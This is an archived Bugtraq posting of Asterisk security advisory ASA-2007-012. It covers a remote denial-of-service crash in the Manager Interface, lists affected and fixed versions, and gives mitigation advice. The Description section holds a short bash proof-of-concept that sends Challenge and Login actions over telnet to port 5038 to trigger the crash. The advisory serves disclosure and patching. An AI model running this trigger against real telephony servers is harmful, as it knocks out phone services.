Bugtraq mailing list archives
ASA-2007-012: Remote Crash Vulnerability in Manager Interface
From: "Kevin P. Fleming" <kpfleming () digium com>
Date: Wed, 25 Apr 2007 14:04:30 -0500
Asterisk Project Security Advisory - ASA-2007-012
+------------------------------------------------------------------------+
| Product | Asterisk |
|---------------------+--------------------------------------------------|
| Summary | Remote Crash Vulnerability in Manager Interface |
|---------------------+--------------------------------------------------|
| Nature of Advisory | Denial of Service |
|---------------------+--------------------------------------------------|
| Susceptibility | Remote Unauthenticated Sessions |
|---------------------+--------------------------------------------------|
| Severity | Moderate |
|---------------------+--------------------------------------------------|
| Exploits Known | Yes |
|---------------------+--------------------------------------------------|
| Reported On | April 24, 2007 |
|---------------------+--------------------------------------------------|
| Reported By | Digium Technical Support |
|---------------------+--------------------------------------------------|
| Posted On | April 24, 2007 |
|---------------------+--------------------------------------------------|
| Last Updated On | April 24, 2007 |
|---------------------+--------------------------------------------------|
| Advisory Contact | russell () digium com |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Description | The Asterisk Manager Interface has a remote crash |
| | vulnerability. If a manager user is configured in |
| | manager.conf without a password, and then a connection |
| | is made that attempts to use that username and MD5 |
| | authentication, Asterisk will dereference a NULL pointer |
| | and crash. |
| | |
| | This example script shows how the crash can be |
| | triggered: |
| | |
| | #!/bin/bash |
| | |
| | function text1() { |
| | |
| | cat <<- EOF |
| | |
| | action: Challenge |
| | |
| | actionid: 0# |
| | |
| | authtype: MD5 |
| | |
| | EOF |
| | |
| | } |
| | |
| | function text2() { |
| | |
| | cat <<- EOF |
| | |
| | action: Login |
| | |
| | actionid: 1# |
| | |
| | key: textstringhere |
| | |
| | username: testuser |
| | |
| | authtype: MD5 |
| | |
| | EOF |
| | |
| | } |
| | |
| | (sleep 1; text1; sleep 1; text2 ) | telnet 127.0.0.1 |
| | 5038 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Resolution | The manager interface is not enabled by default. If it is |
| | enabled, the only way this crash can be exploited is if a |
| | user exists in manager.conf without a password. Given the |
| | conditions necessary for this problem to be exploited, |
| | the severity of this issue is marked as 'moderate'. |
| | |
| | All users of the Asterisk manager interface in affected |
| | versions should ensure that there are no accounts in |
| | manager.conf. Alternatively, the issue can be avoided by |
| | completely disabling the manager interface. |
| | |
| | Users of the manager interface are encouraged to update |
| | to the appropriate version of their Asterisk product |
| | listed in the 'Corrected In' section below. |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.0.x | All versions |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.2.x | All versions prior to |
| | | 1.2.18 |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.4.x | All versions prior to |
| | | 1.4.3 |
|------------------------------+-------------+---------------------------|
| Asterisk Business Edition | A.x.x | All versions |
|------------------------------+-------------+---------------------------|
| Asterisk Business Edition | B.x.x | All versions up to and |
| | | including B.1.3 |
|------------------------------+-------------+---------------------------|
| AsteriskNOW | pre-release | All version up to and |
| | | including Beta5 |
|------------------------------+-------------+---------------------------|
| Asterisk Appliance Developer | 0.x.x | All versions prior to |
| Kit | | 0.4.0 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Corrected In |
|------------------------------------------------------------------------|
| Product | Release |
|-------------------+----------------------------------------------------|
| Asterisk Open | 1.2.18 and 1.4.3, available from |
| Source | ftp://ftp.digium.com/pub/telephony/asterisk |
|-------------------+----------------------------------------------------|
| Asterisk Business | B.1.3.3, available from the Asterisk Business |
| Edition | Edition user portal on http://www.digium.com or |
| | via Digium Technical Support |
|-------------------+----------------------------------------------------|
| AsteriskNOW | Beta6, when available from |
| | http://www.asterisknow.org/. Beta5 can use the |
| | system update feature in the appliance control |
| | panel. |
|-------------------+----------------------------------------------------|
| Asterisk | 0.4.0, available from |
| Appliance | ftp://ftp.digium.com/pub/telephony/aadk/ |
| Developer Kit | |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Links | |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Asterisk Project Security Advisories are posted at |
| http://www.asterisk.org/security. |
| |
| This document may be superseded by later versions; if so, the latest |
| version will be posted at |
| http://www.asterisk.org/files/ASA-2007-012.pdf. |
+------------------------------------------------------------------------+
Asterisk Project Security Advisory - ASA-2007-012
Copyright (c) 2007 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its
original, unaltered form.
Current thread:
- ASA-2007-012: Remote Crash Vulnerability in Manager Interface Kevin P. Fleming (Apr 25)